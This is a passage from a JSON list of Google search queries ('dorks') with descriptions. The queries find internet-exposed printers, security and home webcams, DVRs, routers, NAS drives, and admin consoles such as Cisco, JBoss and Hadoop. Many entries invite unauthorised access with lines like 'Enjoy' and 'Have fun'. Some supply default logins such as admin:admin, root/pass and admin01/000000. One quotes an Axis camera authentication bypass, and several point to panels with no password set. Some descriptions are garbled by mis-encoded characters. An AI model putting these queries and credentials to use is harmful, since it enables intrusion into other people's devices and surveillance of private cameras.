"Lexmark printers (4 models)"}, {"dork": "inurl:/en/help.cgi \"ID=*\"", "description": "Aficio printers (this search locates the help pages)"}, {"dork": "intitle:jdewshlp \"Welcome to the Embedded Web Server!\"", "description": "HP Officejet help page. Remove \"help.html\" for main page."}, {"dork": "\"display printer status\" intitle:\"Home\"", "description": "Xerox Phaser printers."}, {"dork": "inurl:JPGLogin.htm", "description": "webserver detection for GeoHttpServer, the page is the login page or guest cam. Don't ask why these are mostly doggy cams, weirdness."}, {"dork": "\"Please use Netscape 2.0 or enhance !!\" -site:dlink.com -site:ovislink.com.tw", "description": "A search for some HTML code used in a variety of D-link network devices (webcams and such)."}, {"dork": "ext:dhtml intitle:\"document centre|(home)\" OR intitle:\"xerox\"", "description": "Various Online Devices>Xerox (*Centre)"}, {"dork": "intitle:\"SWW link\" \"Please wait.....\"", "description": "Zyxel Zywall"}, {"dork": "intitle:\"InterJak Web Manager\"", "description": "A router device by Uroam (formerly FilaNet), with email and VPN possibilities."}, {"dork": "intitle:\"Netopia Router (*.)\"\"to view this site\"", "description": "Web admin for netopia routersThis Web tool provides access to information about the current status of your router and connections."}, {"dork": "\"To view the Web interface of the SpeedTouch, Java", "description": "speedtouch 510 DSL modem devices that were once unprotected. That may have changed by now."}, {"dork": "intitle:\"Dell *\" inurl:port_0", "description": "oA few Online Dell Printers, status, paper, toner levels, ips macs, the usual.. (Lexmark and Dell seem to share the same embedded webserver it seems, try changing the vendor name.)"}, {"dork": "intitle:\"PacketShaper Customer Login\"", "description": "PacketShaper Login.Provides login access for PacketShaper Customers."}, {"dork": "( intitle:\"PacketShaper Login\")|(intitle:\"PacketShaper Customer Login\")", "description": "Packeteer's PacketShaper is an application traffic management system that monitors, controls, and accelerates application performance over the WAN Internet."}, {"dork": "(cam1java)|(cam2java)|(cam3java)|(cam4java)|(cam5java)|(cam6java) -navy.mil -backflip -power.ne.jp", "description": "Kpix Java Based Traffic Cameras. Based at CBS broadcasting for San Fransisco, Oakland, and San Jose."}, {"dork": "inurl:\"CgiStart?page=\"", "description": "This search reveals even more Panasonic IP cameras!"}, {"dork": "printers/printman.html", "description": "some interesting information on printer status including Name, Location, Model, Pagecount, Action, Status. This summary page also presents several printers in one list, and the status logs reveal more sensitive information like email addresses."}, {"dork": "intitle:\"configuration\" inurl:port_0", "description": "More dell and lexmark printers, The usual things included."}, {"dork": "intitle:\"Dell Laser Printer M5200\" port_0", "description": "Dell Laser Printer M5200"}, {"dork": "\"RICOH Network Printer D model-Restore Factory\"", "description": "Not a whole lot here."}, {"dork": "intitle:\"GCC WebAdmin\" -gcc.ru", "description": "All sorts of various printer status information"}, {"dork": "tilt intitle:\"Live View / - AXIS\" | inurl:view/view.shtml", "description": "A small modification to the AXIS camera search - it now returns cameras with pan / tilt, which is much more fun!"}, {"dork": "http://www.google.com/search?q=intitle:%22Network+Storage+Link+for+USB+2.0+Disks%22+Firmware#=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "description": "Networked USB hard drives (NSLU2). Be sure to disable Google's filter (&filters=0) as that is where they pop up. Default password (Linksys) is admin:admin (just like all the rest). A majority are locked some are not. Some logins to the NSLU2 will be a link off a website. Enjoy."}, {"dork": "intitle:iDVR -intitle:\"com | net | shop\" -inurl:\"asp | htm | pdf | html | php | shtml | com | at | cgi | tv\"", "description": "Online camera. Default login is administrator and password blank. Video server runs default on port 2000. There is an application DVR Center that is used to connect to server and manage recorded videos."}, {"dork": "intitle:\"Orite IC301\" | intitle:\"ORITE Audio IP-Camera IC-301\" -the -a", "description": "This search finds orite 301 netcams with audio capabilities."}, {"dork": "intitle:\"Netcam\" intitle:\"user login\"", "description": "just yet other online cam."}, {"dork": "intitle:\"Biromsoft WebCam\" -4.0 -serial -ask -crack -software -a -the -build -download -v4 -3.01 -numrange:1-10000", "description": "Brimsoft webcam software enables anyone with a webcam to easily create a webcam http server. This googledork looks for these webcam servers."}, {"dork": "(intitle:\"VisionGS Webcam Software\")|(intext:\"Powered by VisionGS Webcam\") -showthread.php -showpost.php -\"Search Engine\" -computersglobal.com -site:g", "description": "I don't know if the google query got submitted right because it looks truncated. here it is again:(intitle:\"VisionGS Webcam Software\")|(intext:\"Powered by VisionGS Webcam\") -showthread.php -showpost.php -\"Search Engine\" -computersglobal.com -site:golb.org -site:chat.ru -site:findlastminute.de -site:tricus.de -site:urlaubus.de -johnny.ihackstuff VisionGS webcam software enables anyone with a webcam to easily host a webcam http server. This dork finds those servers."}, {"dork": "intitle:\"IQeye302 | IQeye303 | IQeye601 | IQeye602 | IQeye603\" intitle:\"Live Images\"", "description": "This is a googledork for IQeye netcams. Some of which you can control how they tilt/zoom. The default admin username/password are root/system."}, {"dork": "(\"port_255/home\")|(inurl:\"home?port=255\")", "description": "standered printer search. Moderator note: see also dork id=1221"}, {"dork": "\"This page is for configuring Samsung Network Printer\" | printerDetails.htm", "description": "several different samsung printers"}, {"dork": "intitle:\"SNOIE Intel Web Netport Manager\" OR intitle:\"Intel Web Netport Manager Setup/Status\"", "description": "Intel Netport Express Print Server."}, {"dork": "intitle:\"Summit Management Interface\" -georgewbush.org.uk", "description": "Extreme Networks Summit Switches Web admin pages. Server: Allegro-Software-RomPager/2.10"}, {"dork": "intitle:Cisco \"You are using an old browser or have disabled javascript. You must use version 4 or higher of Netscape Navigator/Communicator\"", "description": "Login pages for Ciso VPN Concentrator stuff"}, {"dork": "intitle:\"Iomega NAS Manager\" -ihackstuff.com", "description": "Login page dork for Iomega NAS Manager.. There's only 1 result for it now, but this could change in the future."}, {"dork": "intitle:\"Sony SNT-V304 Video Network Station\" inurl:hsrindex.shtml", "description": "The SNT-V304 Video Network Station.Sony's network camera control station."}, {"dork": "inurl:Printers/ipp_0001.asp", "description": "Thanks to Windows 2003 Remote Printing"}, {"dork": "intitle:Axis inurl:\"/admin/admin.shtml\"", "description": "similar searchs exist. This search finds a few more results as well as access to the Admin area or a login screen depending on Cameras configuration."}, {"dork": "inurl:/img/vr.htm", "description": "Linksys wireless G Camera."}, {"dork": "DCS inurl:\"/web/login.asp\"", "description": "Login pages for the DCS-950 Web Camera. Even comes with a built in microphone."}, {"dork": "intitle:\"Dell Laser Printer *\" port_0 -johnny.ihackstuff", "description": "Dell laser printers. This search finds different results that dork id 1077."}, {"dork": "intitle:\"::::: INTELLINET IP Camera Homepage :::::", "description": "A variation on Jeffball55's original Intellinet Ip Camera.This search finds several more web cams.A suggested secondary search:\"Administrator Menu\" \"camera Name\" \"Location\" \"frame rate\" intitle:network.camera -pdfThanks jeffball."}, {"dork": "intitle:\"AR-*\" \"browser of frame dealing is necessary\"", "description": "A few Sharp printers .."}, {"dork": "intext:\"you to handle frequent configuration jobs easily and quickly\" | intitle:\"Show/Search other devices\"", "description": "ELSA DSL lan modems."}, {"dork": "intitle:\"NAS\" inurl:indexeng.html", "description": "Disk Online Server NAS device."}, {"dork": "intitle:\"Skystream Networks Edge Media Router\" -securitytracker.com", "description": "skystream Networks Edge Media Router."}, {"dork": "intitle:\"Ethernet Network Attached Storage Utility\"", "description": "Linksys network storage utility."}, {"dork": "intitle:\"GigaDrive Utility\"", "description": "Linksys GigaDrive network storage utility."}, {"dork": "intitle:\"DVR Client\" -the -free -pdf -downloads -blog -download -dvrtop", "description": "This dork finds digital video recording client from Nuvico."}, {"dork": "\"OK logout\" inurl:vb.htm?logout=1", "description": "This is a google dork for Hunt Electronics web cams. To get to the cameras remove the vb.htm?logout=1 from the url."}, {"dork": "intitle:\"Edr1680 remote viewer\"", "description": "This search finds the 1680 series digital video recorder from EverFocus."}, {"dork": "intitle:\"IVC Control Panel\"", "description": "this searches for security cameras, vendor site:http://www.ivcco.com/"}, {"dork": "(intitle:MOBOTIX intitle:PDAS) | (intitle:MOBOTIX intitle:Seiten) | (inurl:/pda/index.html +camera)", "description": "more cams...vendor site: http://www.mobotix.com/layout/set/index/language/index"}, {"dork": "intitle:\"Veo Observer XT\" -inurl:shtml|pl|php|htm|asp|aspx|pdf|cfm -intext:observer", "description": "just more results for this:http://johnny.ihackstuff.com/index.php?module=prodreviews&func=showcontent&id=1348"}, {"dork": "(intitle:(EyeSpyFX|OptiCamFX) \"go to camera\")|(inurl:servlet/DetectBrowser)", "description": "just more cameras vendor site: http://www.eyespyfx.com/"}, {"dork": "inurl:cgi-bin/guestimage.html", "description": "just more more MOBOTIX's"}, {"dork": "allintitle: EverFocus | EDSR | EDSR400 Applet", "description": "Modified Everfocus search, pulls in EDSR400's as well s a few strays missed by original query."}, {"dork": "allintitle:Edr1680 remote viewer", "description": "Everfocus EDR1680. Only returns 2 or 3 results, but submitted for completeness sake."}, {"dork": "allintitle: EDR1600 login | Welcome", "description": "Everfocus EDR1600"}, {"dork": "allintitle: EDR400 login | Welcome", "description": "Everfocus EDR400"}, {"dork": "intitle:\"Divar Web Client\"", "description": "Boshe/Divar Net Cameras. Uses ActiveX - IE only."}, {"dork": "intitle:\"Live View / - AXIS\" | inurl:view/view.shtml OR inurl:view/indexFrame.shtml | intitle:\"MJPG Live Demo\" | \"intext:Select preset position\"", "description": "No one search will reveal all Axis cameras. This is my mod of one of the queries. It usualy returns 990-1000 of the 1000 results google allows."}, {"dork": "allintitle: Axis 2.10 OR 2.12 OR 2.30 OR 2.31 OR 2.32 OR 2.33 OR 2.34 OR 2.40 OR 2.42 OR 2.43 \"Network Camera \"", "description": "No one search will reveal all Axis cameras. This is a variant for the 2xxx series."}, {"dork": "inurl:wrcontrollite", "description": "Browse up to 16 security cameras at one time :)"}, {"dork": "\"LANCOM DSL/*-* Office *\" \"Entry Page\"", "description": "h**p://www.lancom-systems.de/Login page for these Lancom online DSL devices."}, {"dork": "allintitle:\"SyncThru Web Service\"", "description": "This search finds Internet-connected Samsung printer control panels."}, {"dork": "inurl:/level/15/exec/-/configure/http", "description": "Default Cisco 2800 Series page"}, {"dork": "inurl:/exec/show/tech-support/cr", "description": "Default Cisco 2800 Series page"}, {"dork": "inurl:/level/15/exec/-", "description": "Default Cisco 2800 Series page"}, {"dork": "intitle:\"HtmlAnvView:D7B039C1\"", "description": "This dork finds Wireless Security/Webcams that are accessible from the \nweb. The interesting part is that for some reason these cameras do not \ngenerally allow users to remove/change the default administrative \nusername and pass. So in most cases you can view any camera that shows \nup in the google search.\nDefault Username: admin01\nDefault Password: 000000\n 111111\n 999999\nAuthor: Paul White"}, {"dork": "inurl:RgFirewallRL.asp | inurl:RgDmzHost.asp | inurl:RgMacFiltering.asp | inurl:RgConnect.asp | inurl:RgEventLog.asp | inurl:RgSecurity.asp | inurl:RgContentFilter.asp | inurl:wlanRadio.asp", "description": "Gateway Routers\nAuthor: GhOsT-PR"}, {"dork": "inurl:cgi-bin/cosmobdf.cgi?", "description": "COSMOView for building management. Author: GhOsT-PR"}, {"dork": "intitle:\"hp laserjet\" inurl:info_configuration.htm", "description": "HP LaserJet printers"}, {"dork": "intext:\"You may also donate through the Moneybookers account mb@dd-wrt\"", "description": "Still find alot of equipment running v24 sp1"}, {"dork": "inurl:/control/userimage.html", "description": "Mobotix webcam search. yet another newer search"}, {"dork": "inurl:/voice/advanced/ intitle:Linksys SPA configuration", "description": "This allows you to look at linksys VOIP Router Config pages."}, {"dork": "inurl:*/graphs* intitle:\"Traffic and system resource graphing\"", "description": "With this search you can view results for mikrotik graphics interfaces\n*Obrigado,*"}, {"dork": "intitle:not accepted inurl:\"union+select\" inurl:\"id?=\"", "description": "Find IDS and Mod security\ndork: intitle:not accepted inurl:\"union+select\" inurl:\"id?=\""}, {"dork": "intext:\"Hikvision\" inurl:\"login.asp\"", "description": "Hikvision IP Camera login page"}, {"dork": "dorks:SiteScope inurl:/SiteScope/cgi/go.exe/SiteScope?page=", "description": "inurl:/SiteScope/cgi/go.exe/SiteScope?page=\ntwitter\n@firebitsbr"}, {"dork": "inurl:cgi-bin/mailgraph.cgi", "description": "Mail statistics\nAriel Anonis - @ariel_anonis"}, {"dork": "\".git\" intitle:\"Index of\"", "description": "Shows publicly browsable .git directories"}, {"dork": "inurl:.cgi-bin/luci", "description": "Directory \" Powered by LuCI Trunk\".\nBy Rootkit."}, {"dork": "intitle:\"AP Router New Generation\" intext:\"Status do AP Router\"", "description": "intitle:\"AP Router New Generation\" intext:\"Status do AP Router\"\nShare-Link"}, {"dork": "inurl:upsstats.cgi?host", "description": "UPS Online Devices. Enjoy!!!.\nBy Rootkit."}, {"dork": "inurl:/graphs/ intitle:RouterOs", "description": "files containing juicy info\nAriel Anonis - @ariel_anonis"}, {"dork": "allinurl:foldercontent.html?folder=", "description": "Devices of NAS Iomega Cloud Services.\nEnjoy!!!.\nBy Rootkit."}, {"dork": "inurl:/set_config_password.html", "description": "Submitter: Gman The Mod-dog"}, {"dork": "intitle:\"Solr Admin\" \"Core Admin\" \"Thread Dump\"", "description": "Apache Solr admin interfaces.\n- Andy G - twitter.com/vxhex"}, {"dork": "intitle:index.of inurl:openwebmail -site:openwebmail.org", "description": "Sites with openwebmail installs.\nDecoy"}, {"dork": "intext:\"This is Apache Hadoop release\" \"Local Logs\"", "description": "Google dork Description: bypass information Apache Hadoop Service\nGoogle search: intext:\"This is Apache Hadoop release\" \"Local Logs\"\nSubmited: 2015-11-12\nNote:\nview Hadoop information. - Yudha[at]glosmon.com"}, {"dork": "intitle:\"router\"inurl:\"home.asp\"", "description": "Few routers that can be accessed without login"}, {"dork": "inurl:trafficcams -intext:trafficcams ext:asp OR ext:htm", "description": "Dork who show cams of traffic of a lot of cities.\nDork By Rootkit Pentester."}, {"dork": "inurl:httpmon.php", "description": "Dork for Zabbix Network Monitoring systems.\nDork Discovered by Rootkit Pentester."}, {"dork": "intitle:\"CPPLUS DVR -Web View\"", "description": "CPPLUS DVR\n- Stefano"}, {"dork": "inurl:\"cgi-bin\" \"No password set!\" \" There is no password set on this router.\"", "description": "Dork reveals panels of router without passwords. Enjoy xD.\nThis Dork discovered by Rootkit Pentester."}, {"dork": "inurl:/tcpipv4.htm", "description": "TCP/IP Settings HP LaserJet Logins\n-Xploit"}, {"dork": "inurl:phpPgAdmin/browser.php intitle:\"phpPgAdmin\"", "description": "Dork For phpPgAdmin servers portal.\nDiscovered for Rootkit Pentester.\nRegards."}, {"dork": "inurl:\"info_deviceStatus.html\" | inurl:\"info_suppliesStatus.html\" | inurl:\"info_configuration.html\" | inurl:\"info_config_network.html\" | inurl:\"info_specialPages.html\" | inurl:\"info_colorUsageJobLog.html\" | inurl:\"info_eventLog.html\"", "description": "Description: HP LaserJet printer web panel\nGoogle search: inurl:\"info_deviceStatus.html\" |\ninurl:\"info_suppliesStatus.html\" | inurl:\"info_configuration.html\" |\ninurl:\"info_config_network.html\" | inurl:\"info_specialPages.html\" |\ninurl:\"info_colorUsageJobLog.html\" | inurl:\"info_eventLog.html\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"/owncloud/public.php\" -github -forum", "description": "Dork for shared files Owncloud.\nHave Fun.\nRegards.\nRootkit Pentester."}, {"dork": "intext:\"Powered by BOMGAR\"", "description": "intext:\"Powered by BOMGAR\""}, {"dork": "intitle:\"StrongLoop API Explorer\" intext:\"Token Not Set\"", "description": "Look for open Strongloop\u2019s loopback API Explorer."}, {"dork": "intitle:\"open webif\" \"Linux set-top-box\"", "description": "Web interface that allows full control of Dreambox TV set-top-boxes."}, {"dork": "intitle:Leaf PHP Mailer by [leafmailer.pw] ext:php", "description": "Leaf PHP Mailer by [leafmailer.pw]\n Enjoy with healthy.\nDork by INILERM"}, {"dork": "inurl:/mjpg/video.mjpg", "description": "axis cameras.\nBy Barak Tawily."}, {"dork": "inurl:\"lvappl.htm\"", "description": "Finds live cameras connected to servers on the internet (mostly security\ncams)\nDxtroyer"}, {"dork": "inurl:\"multimon.cgi\" intitle:\"UPS\"", "description": "Finds live traffic monitors, telling you who's online\nDxtroyer"}, {"dork": "inurl:\"this.LCDispatcher?nav=\"", "description": "Finds HP printers connected to the internet\nDxtroyer"}, {"dork": "inurl:\"http://voicemail.\"", "description": "Various voicemail servers like Cisco Unity Messaging."}, {"dork": "(site:onion.link | site:onion.cab | site:tor2web.org | site:onion.sh | site:tor2web.fi | site:onion.direct)", "description": "Finds sites hosted on the Tor network accessible with Tor2Web servers\nDxtroyer"}, {"dork": "intitle:\"Welcome to ZyXEL\" -zyxel.com", "description": "Finds ZyXEL routers, IP cameras, and other devices\nDxtroyer"}, {"dork": "inurl:\"/view/view.shtml?id=\"", "description": "Finds Axis IP cameras\nDxtroyer"}, {"dork": "inurl:\"http://ftp.dlink\"", "description": "This dork allows us to find lists of FTP directories of D-Link routers\ninurl:\"http://ftp.dlink\"\nDrok3r"}, {"dork": "intitle:\"webcamXP 5\" -download", "description": "Finds WebcamXP cameras\nDxtroyer"}, {"dork": "inurl:\"8080/jmx-console\"", "description": "This dork will list all unauthenticated jboss servers with jmx-console\naccess.\n-- \n\u0130smail Baydan"}, {"dork": "inurl:\"ftp://www.\" \"Index of /\"", "description": "Finds various online FTP servers.\nDxtroyer"}, {"dork": "intitle:\"Setup Home\" \"Internet Status\" -belkin", "description": "Finds lots of internet-connected Arris routers\nDxtroyer"}, {"dork": "inurl:\"g2_view=webdav.WebDavMount\"", "description": "inurl:\"g2_view=webdav.WebDavMount\"\nFinds sites with WebDAV enabled\nTPNight"}, {"dork": "inurl:\"/ADVANCED/COMMON/TOP\"", "description": "Finds unpassworded Epson printers\nDxtroyer"}, {"dork": "intitle:\"Namenode information\"", "description": "Finds unpassworded file systems just waiting to be exploited.\nDxtroyer"}, {"dork": "inurl:\"/ap/recuperadocumentossql.aspx\"", "description": "AuraPortal: Internal file disclosure"}, {"dork": "inurl:login.cgi intitle:NETGEAR", "description": "inurl:login.cgi intitle:NETGEAR\nTo find GSS108E ProSAFE PoE+ Click Switches online.\nOften the default password is \"password\" :)\nhttp://www.fr.netgear.ch/images/datasheet/switches/ClickSwitches/GSS108E_GSS108EPP_GSS116E_DS.pdf\n- cyberdefense"}, {"dork": "intitle:\"cuckoo sandbox\" \"failed_reporting\"", "description": "Dork: intitle:\"cuckoo sandbox\" \"failed_reporting\"\nDescription: Find open Cuckoo sanboxes! Free samples!\nAuthor: scumsec"}, {"dork": "intitle:\"GitBucket\" intext:\"Recent updated repositories\" intext:\"Sign In\"", "description": "Dork: intitle:\"GitBucket\" intext:\"Recent updated repositories\" intext:\"Sign In\"\nDescription: Find GitBucket servers\nAuthor: scumsec"}, {"dork": "intitle:\"Namenode information\" AND inurl:\":50070/dfshealth.html\"", "description": "NameNode Storage Information for Infrastructure Hadoop\n------------------------------\nIng. Daniel Maldonado\nhttp://caceriadespammers.com.ar"}, {"dork": "inurl:\"/api/index.php\" intitle:UniFi", "description": "Finds the UniFi API browser with juicy Information such as WiFi passwords\nredstoner2014"}, {"dork": "intitle:\"twonky server\" inurl:\"9000\" -intext:\"9000\"", "description": "Finds Twonky media-sharing servers\nDxtroyer"}, {"dork": "inurl:scgi-bin intitle:\"NETGEAR ProSafe\"", "description": "NETGEAR ProSafe Dual WAN Gigabit Firewall. Default username: admin. Default password: password\ninurl:scgi-bin intitle:\"NETGEAR ProSafe\"\n--\n@verovan"}, {"dork": "inurl:\"img/main.cgi?next_file\"", "description": "Dork that allows us to find online cameras, be it security, webcams, etc.\ninurl:\"img/main.cgi?next_file\"\nDrok3r [ RedTheam - NATASteam ]"}, {"dork": "inurl:share.cgi?ssid=", "description": "This dork show myQnap cloud servers files and folder shared.\nHave Fun!!!.\nRootkit Pentester."}, {"dork": "inurl:browse.php inurl:kcfinder -github.com", "description": "Panels of files for kcfinder Software. Have fun!.\nDork by Rootkit Pentester."}, {"dork": "inurl:autodiscover/autodiscover ext:xml", "description": "Locate Outlook Web Apps that have auto-discover feature enabled\n-Oni49"}, {"dork": "inurl:indexFrame.shtml Axis", "description": "The AXIS 2400 is a Web server of its own. This means that the server is secured like any other Internet host. It is up to the network manager to restrict access to the AXIS Web Cameras camera server. AXIS Network cams have a cam control page called indexFrame.shtml wich can easily be found by searching Google. An attacker can look for the ADMIN button and try the default passwords found in the documentation. An attacker may also find that the directories are browsable. Additional security related information was found on the Internet.Securityfocus(www.securityfocus.com):----------------------------------------------------\"It has been reported that the Axis Video Servers do not properly handle input to the 'command.cgi' script. Because of this, an attacker may be able to create arbitrary files that would result in a denial of service, or potentially command execution.\" Core Security Technologies Advisory (http://www.coresecurity.com):---------------------------------------------------\"We have discovered the following security vulnerability: by accessing http://camera-ip//admin/admin.shtml (notice the double slash) the authentication for \"admin\" is bypassed and an attacker gains direct access to the configuration."}, {"dork": "intitle:\"View and Configure PhaserLink\"", "description": "These printer's configuration is wide open. Attackers can change just about any value through this control panel. Take it from FX, printers can be dangerous too! Besides, a POP3 server, username and password can be entered into these things! =)"}, {"dork": "inurl:\"ViewerFrame?Mode=\"", "description": "Panasonic Network Cameras can be viewed and controlled from a standard web browser. These cameras can be placed anywhere to keep an eye on things, with no PC required on the location. Check for more information: http://www.panasonic.com/netcam/There is a htaccess protected admin page at \"http://[target-ip]/config.html\" on the target device. Admin logins have no defaults, but created during setup."}, {"dork": "sNC-RZ30 HOME", "description": "sony NC RZ30 camera's require a java capable browser. The admin panel is found at http://[sitename]/home/l4/admin.html."}, {"dork": "intitle:flexwatch intext:\"Home page ver\"", "description": "seyeon provides various type of products and software to build up a remote video monitoring and surveillance system over the TCP/IP network. FlexWATCH\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 Network video server series has built-in Web server based on TCP/IP technology. It also has an embedded RTOS.The admin pages are at http://[sitename]/admin/aindex.htm."}, {"dork": "intitle:snc-z20 inurl:home/", "description": "sony NC RZ20 cameras, only one result for this cam at the moment, a nice street view from a skyscraper."}, {"dork": "(intext:\"MOBOTIX M1\" | intext:\"MOBOTIX M10\") intext:\"Open Menu\" Shift-Reload", "description": "Mobotix netcams use the thttpd-2.x. server (http://www.acme.com/software/thttpd/). The latest version today is 2.25b, but most cams run older versions. They produce a rather nice image quality.Moderator note: this search was found by L0om and cleaned up by Wolveso."}, {"dork": "intitle:\"WJ-NT104 Main Page\"", "description": "The Panasonic WJ-NT104 allows easy monitoring with a conventional browser. More vendor information is available at hxxp://www.panasonic.ca/English/Broadcast/security/transmission/wjnt104.asp"}, {"dork": "\"powered by webcamXP\" \"Pro|Broadcast\"", "description": "webcamXP PRO:http://www.webcamxp.com/productsadv.htmlThis is the most advanced version of the software. It has all the features of the other versions (including advanced users management, motion detector, and alerts manager) plus remote administration and external server notification when going offline/online."}, {"dork": "intitle:\"Live View / - AXIS\"", "description": "These AXIS cams seem to run their own http server (Boa/0.94.13). The setup button can be hidden. The devices ship with a default password pair (quoting from the FAQ): \"By default, the username will be \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201croot\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2 and the password will be \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201cpass\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2. If these are not the current values, performing a factory default on the unit will reset the password to \u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u2039\u00c5\u201cpass\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u20ac\u0161\u00c2\u00ac\u00c3\u00a2\u00e2\u20ac\u017e\u00c2\u00a2.\"Some models found in this search:- AXIS 205 version 4.0x- AXIS 210 Network Camera version: 4.0x- AXIS 241S Video Server version: 4.0x- AXIS 241Q Video Server version 4.0x"}, {"dork": "intitle:\"BorderManager Information alert\"", "description": "This is an Informational message produced by the Novell BorderManager firewall/proxy server. Attackers can located perimeter defence systems with this query."}, {"dork": "\"Phaser 6250\" \"Printer Neighborhood\" \"XEROX CORPORATION\"", "description": "Base Specifications Phaser 6250N: Letter/Legal Size Color Printer 110V, 26ppm Color/B&W (24ppm A4 Color/B&W), 2400dpi, 700MHz Processor, Ethernet, 256MB Memory, Photo Quality Mode, Network Feature SetPassword not allways needed it seems, depends on admin setup.."}, {"dork": "\"Phaser\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 740 Color Printer\" \"printer named: \"", "description": "This product is supported but no longer sold by Xerox in the United States. Replacement Product: Phaser\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 6250.Configuration pages are password protected."}, {"dork": "\"Phaser 8200\" \"\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00a9 Xerox\" \"refresh\" \" Email Alerts\"", "description": "Brochure info: \"The Phaser 8200 uses solid ink, an alternative technology to laser printing. Unlike typical laser printers, solid ink doesn't require throwaway cartridges to get ink in the printer.\" Using the Internet, your printer can send performance information to our computers. PhaserSMART, our diagnostic system, examines the information, diagnoses the issue, and immediately walks you through a proposed solution. Automatic alerts minimize printer management problems. Alerts notify you via email when it's time to replace supplies, or when service is required.\"Moderator note: you may not be able to connect to the links Google gives if the printers are turned off when not in use."}, {"dork": "\"Phaser\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 840 Color Printer\" \"Current Status\" \"printer named:\"", "description": "This product is supported but no longer sold by Xerox in the United States. Support and supplies for this product continue to be available online. Replacement Product: Phaser\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2 8400This search finds the PhaserLinkTM Printer Management Software for the Phaser\u00c3\u0192\u00e2\u20ac\u0161\u00c3\u201a\u00c2\u00ae 840 Color Printer. It seems at least the \"Print DEMO\" page works without authentication."}, {"dork": "intitle:liveapplet inurl:LvAppl", "description": "Canon has a series of netcams that all use the \"WebView LiveScope\" software. They are frequently used by japanese sites. Unfortunately most are crawled by their IP address so determining their location becomes more difficult. Some model names are:* VB-C10* VB-101* VB-C50iThis search looks for the java applet called \"LiveApplet\" that is used by Canon's network camera feeds. There is also a standalone (free) program, that is easier to control and lets you save bookmarks. It's available for PC and MACs. The win32 download is here: http://www.x-zone.canon.co.jp/cgi-bin/nph-wvh35-cs.cgi"}, {"dork": "intext:centreware inurl:status", "description": "More Xerox printers (Phasers 4500/6250/8200/8400). An attacker can access the webinterface with this search."}, {"dork": "intitle:\"dreambox web\"", "description": "this search will show web administration interfaces of linux dream boxes.The Dreambox is one of the popular 3rd generation boxes. Based on a powerful IBM PowerPC (not PC !) with an MPEG1/2 hardware decoder, this box is FULLY open, with an open source Linux operating system. The Dreambox not only offers high quality video and audio, but also has a variety of connections to the outside world: Ethernet, USB, PS2, Compact Flash and two Smartcard readers. The box can handle any dish configuration, an unlimited number of channels or satellites, has a very fast channel scan, allows for direct digital recording, etc."}, {"dork": "intitle:\"Live View / - AXIS\" | inurl:view/view.sht", "description": "More Axis Netcams, this search combines the cams with the default title (Live View) and extends it by searching for the \"view/view.shtml\" URL identifier. Models found with this search are:AXIS 205 version 4.02AXIS 206M Network Camera version 4.10AXIS 206W Network Camera version 4.10AXIS 211 Network Camera version 4.02AXIS 241S Video Server version 4.02AXIS 241Q Video Server version 4.01Axis 2100 Network CameraAxis 2110 Network Camera 2.34Axis 2120 Network Camera 2.40AXIS 2130R PTZ Network Camera"}, {"dork": "intitle:\"The AXIS 200 Home Page\"", "description": "The Axis 200 HOME pages reside within the AXIS 200 device and hold information about the current software version, technical documentation, some howto's and the device settings."}, {"dork": "(\"Fiery WebTools\" inurl:index2.html) | \"WebTools enable * * observe, *, * * * flow * print jobs\"", "description": "Fiery WebTools offers many of the same capabilities of the Command WorkStation\u00c3\u0192\u00c2\u00a2\u00c3\u00a2\u00e2\u201a\u00ac\u00c5\u00be\u00c3\u201a\u00c2\u00a2, via a Java-enabled Web browser. All job control options such as job merging, edition and previews, as well as information on the status of the jobs are accessible through Fiery WebTools."}, {"dork": "intitle:\"network administration\" inurl:\"nic\"", "description": "This finds Konica Network Printer Administration pages. There is one result at the time of writing."}, {"dork": "inurl:sts_index.cgi", "description": "The Ricoh Aficio 1022 is a digital multifunctional B&W copier, easily upgraded to include network printing, network scanning, standard/LAN faxing and storage capabilities."}, {"dork": "intitle:RICOH intitle:\"Network Administration\"", "description": "Network Administration pages for several Ricoh Afficio printer models, for example the Aficio 1018D and RICOH LASER AP1600."}, {"dork": "intitle:\"lantronix web-manager\"", "description": "The Lantronix web manager home pages show the print server configuration (Server Name, Boot Code Version, Firmware, Uptime, Hardware Address, IP Address and Subnet Mask). The other setting pages are password protected."}, {"dork": "intitle:\"axis storpoint CD\" intitle:\"ip address\"", "description": "Axis' network CD/DVD servers are faster, less costly and easier to manage than using full-blown file servers for networking CD/DVD collections. Any organization that relies heavily on CD/DVD-based information can benefit from an AXIS StorPoint CD+."}, {"dork": "intitle:\"switch home page\" \"cisco systems\" \"Telnet - to\"", "description": "Most cisco switches are shipped with a web administration interface. If a switch is reachable from the internet and google cashed it this search will show it."}, {"dork": "(inurl:webArch/mainFrame.cgi ) | (intitle:\"web image monitor\" -htm -solutions)", "description": "The Ricoh Aficio 2035 (fax/scanner) web interface.Attackers may read faxes and can get information like internal ip addresses.cleanup by: yeseins & golfocleanup date: Apr 28, 2005original dork: inurl:webArch/mainFrame.cgi"}, {"dork": "inurl:netw_tcp.shtml", "description": "An Axis Network Camera captures and transmits live images directly over an IP network (e.g. LAN/intranet/Internet), enabling users to remotely view and/or 